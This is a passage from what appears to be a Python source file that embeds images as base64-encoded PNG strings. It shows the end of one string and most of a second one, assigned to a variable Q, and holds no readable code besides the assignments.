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"""
Q="""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